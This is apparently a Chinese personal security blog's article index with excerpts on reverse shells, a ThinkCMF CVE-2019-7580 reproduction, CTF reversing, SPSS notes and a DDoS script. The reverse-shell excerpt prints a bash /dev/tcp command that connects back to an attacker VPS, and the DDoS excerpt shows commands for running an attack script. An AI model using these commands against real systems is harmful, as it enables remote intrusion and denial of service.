wjl110

分类

GitHub(2) vulfocus漏洞复现(2) Wordpress(2) 博客(2) 学习笔记(8) 未归档(1) 渗透笔记(6) 笔记(3)

/ 注册

一位有品位的信息安全开发者~

全部文章（共26篇）

【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i ＞& /dev/tcp/vps的ip/vps的端口 0＞&1

文章目录前言为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官...

2022-04-22

0 550

[vulfocus漏洞复现]thinkcmf 代码执行漏洞复现（CVE-2019-7580）phpinfo()；ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPH

前言 ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. thinkcmf5.0.19 这个版本后台提供路由自定义，其中路由的别名对单引号缺少过滤，导致引发漏洞。文章也会在这里同步 0x01进入后台进入后台路径为:http://ip:p...

2022-04-22

0 498

逆向工程师逆向还原APP和代码，国产化就是这样

二进制逆向：将获得的代码解包，用二进制软件打开 ### 发现是用python代码写的程序，用解包程序反编译 ### 用vscode自带的hex进行逆向解码 ### 解开就得到了.pyc文件### 将反编译的.py文件里的代码逆向还原为flag即可获取到flag 写作耗时20分钟

2022-04-22

0 288

【学习笔记】--mooc--教学研究的数据处理与工具应用（问卷+问卷星的使用+SPSS的下载、安装、使用、入门）--华南师范大学

本人于mooc网学习笔记整理，转载需标明出处* 若有错误，欢迎指正关于用《教学研究》的简单例子来讲述数据处理即：研究学生的相关数据对学生成绩的影响课程大纲：第一章-概论 1.三种处理方法* 2.课程学习目的 3.提升的能力有哪些？ 4.选择适合自己的高效...

2022-04-22

0 276

代码和人有一个能跑就刑*一键ddos攻击源码,体验命令行飞速刷屏的感觉

ddos攻击笔记版本:Mac book Air M1芯片文章仅做学习技术交流,不得用于非法活动点击我查看攻击小视频效果展示(时长:19秒) shot on iphone cd DDOS-Attack chmod +x ddos-attack.py python ...

2022-04-22

0 300

Markdown编辑器学习

欢迎使用 MWeb MWeb 是专业的 Markdown 写作、记笔记、静态博客生成软件，目前已支持 Mac，iPad 和 iPhone。MWeb 有以下特色：软件本身：使用原生的 macOS 技术打造，追求与系统的完美结合。原则上，首先是追求界面简洁和高性能，然后才是强大易用...

学习笔记

2022-03-09

0 417